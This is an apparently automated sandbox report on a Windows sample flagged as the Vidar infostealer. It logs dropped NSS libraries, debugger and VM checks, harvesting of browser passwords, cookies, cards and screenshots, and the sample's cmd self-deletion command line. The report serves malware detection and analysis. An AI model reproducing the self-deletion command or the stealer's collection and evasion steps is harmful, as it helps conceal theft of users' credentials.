Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "T6zZFfRLqs.exe")

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/18@1/3

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: T6zZFfRLqs.exe, 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, nss3[1].dll.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: T6zZFfRLqs.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: T6zZFfRLqs.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: T6zZFfRLqs.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_00417000 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,Process32Next,CloseHandle,

1_2_00417000

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: T6zZFfRLqs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source:	Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;

Source: mozglue[1].dll.1.dr	Static PE information: section name: .didat
Source: mozglue.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_0041A730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,

1_2_0041A730

Source: initial sample

Static PE information: section name: .text entropy: 7.9868866426

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit			Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_00496880 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00496880

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 6920

Thread sleep count: 48 > 30

Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_00492480 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00492694h

1_2_00492480

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_0044E950 GetSystemInfo,

1_2_0044E950

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	1_2_0041B590
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW,	1_2_00496670
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,	1_2_0041B810
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	1_2_0040EB20
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,	1_2_00405D80

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

1_2_0040F150

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: T6zZFfRLqs.exe, 00000001.00000002.397837562.000000000082A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:NT

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_004A31A7

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

1_2_0041A730

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_0041A030 GetProcessHeap,HeapAlloc,_strcpy_s,

1_2_0041A030

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_00401000 mov eax, dword ptr fs:[00000030h]

1_2_00401000

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_004A31A7

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f

Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\CC\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Edge_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\IE_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Downloads\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Files\Default.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\History\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\information.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\passwords.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\screenshot.jpg VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memmove,_memmove,_memset,LocalFree,	1_2_00492480
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	1_2_004AC142
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	1_2_004AB23B
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	1_2_004AC430
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	1_2_004AB4E6

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

1_2_00492360

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

1_2_00492360

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_0041F2B3 __wgetenv,__wgetenv,__wgetenv,_memset,GetVersionExA,CreateDirectoryA,_memset,__wgetenv,DeleteFileA,DeleteFileA,DeleteFileA,

1_2_0041F2B3

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Code function: 1_2_00491AC0 GetUserNameA,

1_2_00491AC0

Stealing of Sensitive Information:

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Show sources

